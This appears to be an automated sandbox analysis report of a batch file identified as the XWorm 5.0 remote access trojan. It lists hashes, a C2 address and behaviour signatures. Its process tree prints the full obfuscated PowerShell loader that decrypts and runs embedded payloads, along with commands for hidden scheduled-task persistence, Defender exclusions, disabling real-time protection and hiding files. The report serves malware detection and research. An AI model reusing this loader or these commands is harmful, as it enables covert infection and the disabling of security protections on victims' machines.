Overview

overview

10

Static

static

1

skuld.bat

windows7-x64

8

skuld.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    104s
  • max time network
    101s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-06-2024 05:20

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    skuld.bat

  • Size

    26.0MB

  • MD5

    b6043c62279ba9658cb83d9a25e5a23b

  • SHA1

    f707fc5bb01d16e151fe115dccc730819a81da88

  • SHA256

    edd80a73c65730613d5eda3a78a5a79d7acf9c93b054882ff0f57f0cddfae36c

  • SHA512

    273c82e5f1a80d810874fcea5e03527bf0fe39663a875444ae15194a535b5ba37340193074abcb7534a17d0a99e52b77029a7a659505f488ec8717db54db7d69

  • SSDEEP

    49152:Mh3gBzuxsw5ZfN2roFEHsPlg2pTVDOlNtcU62VVQ4OnlDmhJaER7dZ0bGm47Nb9T:Me

Score
10/10
xwormexecutionpersistenceprivilege_escalationratspywaretrojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

amount-socket.gl.at.ply.gg:29643

Mutex

CBOJbsqFCwukBOQm

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Drops file in Drivers directory 3 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 1 IoCs
  • Modifies registry class 33 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SendNotifyMessage 37 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs
    evasion

Processes

  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k DcomLaunch -p
    1⤵
    • Modifies registry class
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    PID:792
    • C:\Windows\system32\DllHost.exe
      C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
      2⤵
        PID:4024
      • C:\Windows\system32\BackgroundTaskHost.exe
        "C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider
        2⤵
          PID:3576
        • C:\Windows\system32\DllHost.exe
          C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
          2⤵
            PID:1232
          • C:\Windows\system32\BackgroundTaskHost.exe
            "C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider
            2⤵
              PID:3324
            • C:\Windows\system32\backgroundTaskHost.exe
              "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
              2⤵
                PID:2724
              • C:\Windows\system32\DllHost.exe
                C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                2⤵
                  PID:3284
                • C:\Windows\SysWOW64\DllHost.exe
                  C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
                  2⤵
                    PID:2376
                  • C:\Windows\explorer.exe
                    C:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding
                    2⤵
                    • Modifies Internet Explorer settings
                    • Modifies registry class
                    PID:3604
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k RPCSS -p
                  1⤵
                    PID:904
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                    1⤵
                      PID:960
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                      1⤵
                        PID:392
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
                        1⤵
                          PID:516
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                          1⤵
                            PID:756
                          • C:\Windows\System32\svchost.exe
                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                            1⤵
                              PID:1076
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                              1⤵
                                PID:1084
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                1⤵
                                  PID:1204
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                  1⤵
                                  • Drops file in System32 directory
                                  PID:1220
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                  1⤵
                                    PID:1280
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                    1⤵
                                      PID:1296
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                      1⤵
                                        PID:1404
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                        1⤵
                                          PID:1428
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                          1⤵
                                            PID:1528
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                            1⤵
                                              PID:1564
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                              1⤵
                                                PID:1572
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                1⤵
                                                  PID:1688
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                  1⤵
                                                    PID:1712
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                    1⤵
                                                      PID:1756
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                      1⤵
                                                        PID:1812
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                        1⤵
                                                          PID:1820
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                          1⤵
                                                            PID:1940
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                            1⤵
                                                              PID:1948
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                              1⤵
                                                                PID:1976
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                1⤵
                                                                  PID:1448
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
                                                                  1⤵
                                                                    PID:2164
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                    1⤵
                                                                      PID:2220
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                      1⤵
                                                                        PID:2292
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                        1⤵
                                                                          PID:2380
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                          1⤵
                                                                            PID:2508
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                            1⤵
                                                                              PID:2512
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                              1⤵
                                                                                PID:2676
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                                1⤵
                                                                                • Drops file in System32 directory
                                                                                PID:2760
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                1⤵
                                                                                  PID:2844
                                                                                • C:\Windows\System32\svchost.exe
                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                  1⤵
                                                                                    PID:2896
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                    1⤵
                                                                                      PID:2908
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                      1⤵
                                                                                        PID:3020
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                        1⤵
                                                                                          PID:3556
                                                                                        • C:\Windows\Explorer.EXE
                                                                                          C:\Windows\Explorer.EXE
                                                                                          1⤵
                                                                                          • Modifies registry class
                                                                                          • Suspicious behavior: GetForegroundWindowSpam
                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                          • Suspicious use of SendNotifyMessage
                                                                                          PID:3588
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\skuld.bat"
                                                                                            2⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:3756
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9HW8+LZ7W8Iu3u/y2KrXmy8AoR48YEg4UVvE8kTk/+U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3WrT9EO2jZTElsL/+FG+Ng=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $oCVli=New-Object System.IO.MemoryStream(,$param_var); $LCoEj=New-Object System.IO.MemoryStream; $umAPC=New-Object System.IO.Compression.GZipStream($oCVli, [IO.Compression.CompressionMode]::Decompress); $umAPC.CopyTo($LCoEj); $umAPC.Dispose(); $oCVli.Dispose(); $LCoEj.Dispose(); $LCoEj.ToArray();}function execute_function($param_var,$param2_var){ $tcHJz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ndESF=$tcHJz.EntryPoint; $ndESF.Invoke($null, $param2_var);}$rXqmw = 'C:\Users\Admin\AppData\Local\Temp\skuld.bat';$host.UI.RawUI.WindowTitle = $rXqmw;$daRKi=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($rXqmw).Split([Environment]::NewLine);foreach ($cjVQB in $daRKi) { if ($cjVQB.StartsWith('FWhwVisqZfAwLTGwgtXB')) { $EMjoX=$cjVQB.Substring(20); break; }}$payloads_var=[string[]]$EMjoX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                              3⤵
                                                                                                PID:3792
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                                3⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Modifies registry class
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:3316
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_870_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_870.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                                                  4⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:3304
                                                                                                • C:\Windows\System32\WScript.exe
                                                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_870.vbs"
                                                                                                  4⤵
                                                                                                  • Checks computer location settings
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:4068
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_870.bat" "
                                                                                                    5⤵
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:368
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9HW8+LZ7W8Iu3u/y2KrXmy8AoR48YEg4UVvE8kTk/+U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3WrT9EO2jZTElsL/+FG+Ng=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $oCVli=New-Object System.IO.MemoryStream(,$param_var); $LCoEj=New-Object System.IO.MemoryStream; $umAPC=New-Object System.IO.Compression.GZipStream($oCVli, [IO.Compression.CompressionMode]::Decompress); $umAPC.CopyTo($LCoEj); $umAPC.Dispose(); $oCVli.Dispose(); $LCoEj.Dispose(); $LCoEj.ToArray();}function execute_function($param_var,$param2_var){ $tcHJz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ndESF=$tcHJz.EntryPoint; $ndESF.Invoke($null, $param2_var);}$rXqmw = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_870.bat';$host.UI.RawUI.WindowTitle = $rXqmw;$daRKi=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($rXqmw).Split([Environment]::NewLine);foreach ($cjVQB in $daRKi) { if ($cjVQB.StartsWith('FWhwVisqZfAwLTGwgtXB')) { $EMjoX=$cjVQB.Substring(20); break; }}$payloads_var=[string[]]$EMjoX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                                      6⤵
                                                                                                        PID:2940
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                                        6⤵
                                                                                                        • Blocklisted process makes network request
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Drops file in Drivers directory
                                                                                                        • Deletes itself
                                                                                                        • Adds Run key to start application
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:3500
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xworm.bat" "
                                                                                                          7⤵
                                                                                                            PID:2828
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OizxnO3/pdWJ2fJPn6JfWHEAeJ8e9YmWGBkF1RD8gB4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('M1hDsCU064fe3nz1n2J+tA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BuVAi=New-Object System.IO.MemoryStream(,$param_var); $nTyYw=New-Object System.IO.MemoryStream; $UaJSA=New-Object System.IO.Compression.GZipStream($BuVAi, [IO.Compression.CompressionMode]::Decompress); $UaJSA.CopyTo($nTyYw); $UaJSA.Dispose(); $BuVAi.Dispose(); $nTyYw.Dispose(); $nTyYw.ToArray();}function execute_function($param_var,$param2_var){ $UcolZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iAUtD=$UcolZ.EntryPoint; $iAUtD.Invoke($null, $param2_var);}$QWHqr = 'C:\Users\Admin\AppData\Local\Temp\xworm.bat';$host.UI.RawUI.WindowTitle = $QWHqr;$RtxIM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QWHqr).Split([Environment]::NewLine);foreach ($igBOM in $RtxIM) { if ($igBOM.StartsWith('RgLhaxlcPBQqpmRoVUam')) { $EeOca=$igBOM.Substring(20); break; }}$payloads_var=[string[]]$EeOca.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                                              8⤵
                                                                                                                PID:1180
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                                                8⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                • Modifies registry class
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                PID:4728
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_927_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_927.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                                                                  9⤵
                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:3456
                                                                                                                • C:\Windows\System32\WScript.exe
                                                                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_927.vbs"
                                                                                                                  9⤵
                                                                                                                  • Checks computer location settings
                                                                                                                  PID:3624
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_927.bat" "
                                                                                                                    10⤵
                                                                                                                      PID:3836
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OizxnO3/pdWJ2fJPn6JfWHEAeJ8e9YmWGBkF1RD8gB4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('M1hDsCU064fe3nz1n2J+tA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BuVAi=New-Object System.IO.MemoryStream(,$param_var); $nTyYw=New-Object System.IO.MemoryStream; $UaJSA=New-Object System.IO.Compression.GZipStream($BuVAi, [IO.Compression.CompressionMode]::Decompress); $UaJSA.CopyTo($nTyYw); $UaJSA.Dispose(); $BuVAi.Dispose(); $nTyYw.Dispose(); $nTyYw.ToArray();}function execute_function($param_var,$param2_var){ $UcolZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iAUtD=$UcolZ.EntryPoint; $iAUtD.Invoke($null, $param2_var);}$QWHqr = 'C:\Users\Admin\AppData\Roaming\Windows_Log_927.bat';$host.UI.RawUI.WindowTitle = $QWHqr;$RtxIM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QWHqr).Split([Environment]::NewLine);foreach ($igBOM in $RtxIM) { if ($igBOM.StartsWith('RgLhaxlcPBQqpmRoVUam')) { $EeOca=$igBOM.Substring(20); break; }}$payloads_var=[string[]]$EeOca.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                                                        11⤵
                                                                                                                          PID:788
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                                                          11⤵
                                                                                                                          • Blocklisted process makes network request
                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:4168
                                                                                                                • C:\Windows\system32\attrib.exe
                                                                                                                  attrib +h +s C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  7⤵
                                                                                                                  • Drops file in System32 directory
                                                                                                                  • Views/modifies file attributes
                                                                                                                  PID:3776
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\skuld.bat" "
                                                                                                                  7⤵
                                                                                                                    PID:4696
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tLPLnyvWPaphEmS37XPXScEiOy5ov6wE/scYj+jBN08='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u2XafaOdagMZual482GQjg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $obFyo=New-Object System.IO.MemoryStream(,$param_var); $BaZuf=New-Object System.IO.MemoryStream; $Cjcmb=New-Object System.IO.Compression.GZipStream($obFyo, [IO.Compression.CompressionMode]::Decompress); $Cjcmb.CopyTo($BaZuf); $Cjcmb.Dispose(); $obFyo.Dispose(); $BaZuf.Dispose(); $BaZuf.ToArray();}function execute_function($param_var,$param2_var){ $rDWom=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $PpMYM=$rDWom.EntryPoint; $PpMYM.Invoke($null, $param2_var);}$TZbQs = 'C:\Users\Admin\AppData\Local\Temp\skuld.bat';$host.UI.RawUI.WindowTitle = $TZbQs;$mutAf=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($TZbQs).Split([Environment]::NewLine);foreach ($NZkFA in $mutAf) { if ($NZkFA.StartsWith('YSPTlJoJeJoEhZxsRksZ')) { $HqLRD=$NZkFA.Substring(20); break; }}$payloads_var=[string[]]$HqLRD.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                                                      8⤵
                                                                                                                        PID:3776
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                                                                                        8⤵
                                                                                                                          PID:4508
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        powershell -Command Add-MpPreference -ExclusionPath C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        7⤵
                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        PID:3280
                                                                                                                      • C:\Windows\system32\attrib.exe
                                                                                                                        attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                                                                                                                        7⤵
                                                                                                                        • Views/modifies file attributes
                                                                                                                        PID:4340
                                                                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                        wmic os get Caption
                                                                                                                        7⤵
                                                                                                                          PID:3304
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                          7⤵
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          PID:3316
                                                                                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                          wmic cpu get Name
                                                                                                                          7⤵
                                                                                                                            PID:4636
                                                                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                            wmic path win32_VideoController get name
                                                                                                                            7⤵
                                                                                                                            • Detects videocard installed
